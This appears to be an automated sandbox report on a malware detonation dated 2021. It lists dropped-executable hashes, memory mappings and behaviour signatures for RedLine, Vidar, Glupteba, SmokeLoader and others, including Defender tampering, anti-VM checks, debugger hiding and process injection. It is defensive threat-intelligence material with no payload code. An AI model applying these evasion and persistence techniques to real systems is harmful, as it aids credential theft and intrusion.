memory/2568-358-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
| MD5 | 161b975933aaae18920d241890000dac |
| SHA1 | 1cbbad54762c6301ad9ad2291159b9d2a141c143 |
| SHA256 | dcdb0bc5e91652e7e3d2269581275c18d8c5eabbde14f9c17c99e5ff49e54a83 |
| SHA512 | 758d1d206c887637d0727ba380d94d4cc1bb8a37cc705dbe62435a45c4ebb0ea111c9e9238261da64dd0d8ee5e27fd9851053dffa0359670a165973dd4f91443 |
memory/664-356-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
C:\Users\Admin\AppData\Local\Temp\sqlite.dat
| MD5 | c78bf51ee294161707a6766e71cee582 |
| SHA1 | 3bb4ff0b06fc5b3753ab39f21e959895834bf7f8 |
| SHA256 | be449f187ec6ee4c4fa40642e698ffa3bfa19ec08848f4e0273b70427a1f1fc2 |
| SHA512 | b2d7d6d8c12b0dbdd677bc8acd764ab0687e976268e46f461b98c5cf941197785b5d5718d2e3a734eae49b0d358064ee23d9aae217af5f98da5252a8a11d531d |
memory/5084-368-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
memory/3864-367-0x0000000000000000-mapping.dmp
memory/4160-366-0x0000000000000000-mapping.dmp
memory/4032-365-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
memory/1148-371-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/4660-393-0x0000000000000000-mapping.dmp
memory/4364-394-0x0000000000000000-mapping.dmp
memory/4684-390-0x0000000004B80000-0x0000000004B81000-memory.dmp
memory/4988-397-0x0000000005730000-0x0000000005CD6000-memory.dmp
memory/2376-399-0x0000000002E90000-0x0000000002E99000-memory.dmp
memory/3776-400-0x0000000000000000-mapping.dmp
memory/4032-401-0x0000000004A00000-0x0000000004A2F000-memory.dmp
memory/5084-404-0x0000000005910000-0x0000000005911000-memory.dmp
memory/3120-403-0x0000000000000000-mapping.dmp
memory/5132-406-0x0000000000000000-mapping.dmp
memory/3120-407-0x00000000008E0000-0x00000000008E3000-memory.dmp
memory/5656-430-0x0000000000000000-mapping.dmp
memory/5572-428-0x0000000000000000-mapping.dmp
memory/5808-440-0x0000000000000000-mapping.dmp
memory/5512-450-0x0000000000000000-mapping.dmp
memory/664-451-0x0000000004150000-0x00000000041ED000-memory.dmp
memory/3776-459-0x000001E0A7180000-0x000001E0A71EE000-memory.dmp
memory/896-465-0x0000000005580000-0x0000000005581000-memory.dmp
memory/1020-477-0x0000000004080000-0x00000000040B0000-memory.dmp
memory/3776-481-0x000001E0A71F0000-0x000001E0A72BF000-memory.dmp
memory/960-473-0x0000000002600000-0x000000000262F000-memory.dmp
memory/3024-480-0x0000000000000000-mapping.dmp
memory/3864-488-0x00000000059F0000-0x00000000059F1000-memory.dmp
memory/4544-486-0x0000000000000000-mapping.dmp
memory/5512-510-0x0000000005540000-0x0000000005B58000-memory.dmp
memory/1440-518-0x0000000000000000-mapping.dmp
memory/72-524-0x0000000000000000-mapping.dmp
memory/2572-532-0x0000000000000000-mapping.dmp
memory/5656-537-0x0000000004920000-0x0000000004F38000-memory.dmp
memory/5964-535-0x0000000000000000-mapping.dmp
memory/5236-546-0x0000000000000000-mapping.dmp
memory/4544-549-0x0000000000000000-mapping.dmp
memory/2136-550-0x0000000000000000-mapping.dmp
memory/5080-552-0x0000000000000000-mapping.dmp
memory/5792-554-0x0000000000000000-mapping.dmp
memory/5588-556-0x0000000000000000-mapping.dmp
memory/4148-559-0x0000000000000000-mapping.dmp
memory/5456-561-0x0000000000000000-mapping.dmp
memory/4652-558-0x0000000000000000-mapping.dmp
memory/4160-557-0x0000000004930000-0x0000000005256000-memory.dmp
memory/5776-566-0x0000000000000000-mapping.dmp
memory/5472-569-0x0000000000000000-mapping.dmp
memory/4652-568-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5360-565-0x0000000000000000-mapping.dmp
memory/5776-572-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4148-570-0x000000001B120000-0x000000001B122000-memory.dmp
memory/5472-577-0x0000000003010000-0x0000000003011000-memory.dmp
memory/5080-579-0x0000000004940000-0x00000000049CF000-memory.dmp
memory/6084-575-0x00000000021B0000-0x00000000021B1000-memory.dmp
memory/4208-582-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3928-586-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5780-584-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5720-592-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4372-590-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/4372-594-0x0000000005910000-0x0000000005911000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
91s
Max time network
265s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4568 created 1736 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe |
| PID 4484 created 4000 | N/A | C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe | C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe |
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 3368 | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
Suspicious use of SetWindowsHookEx
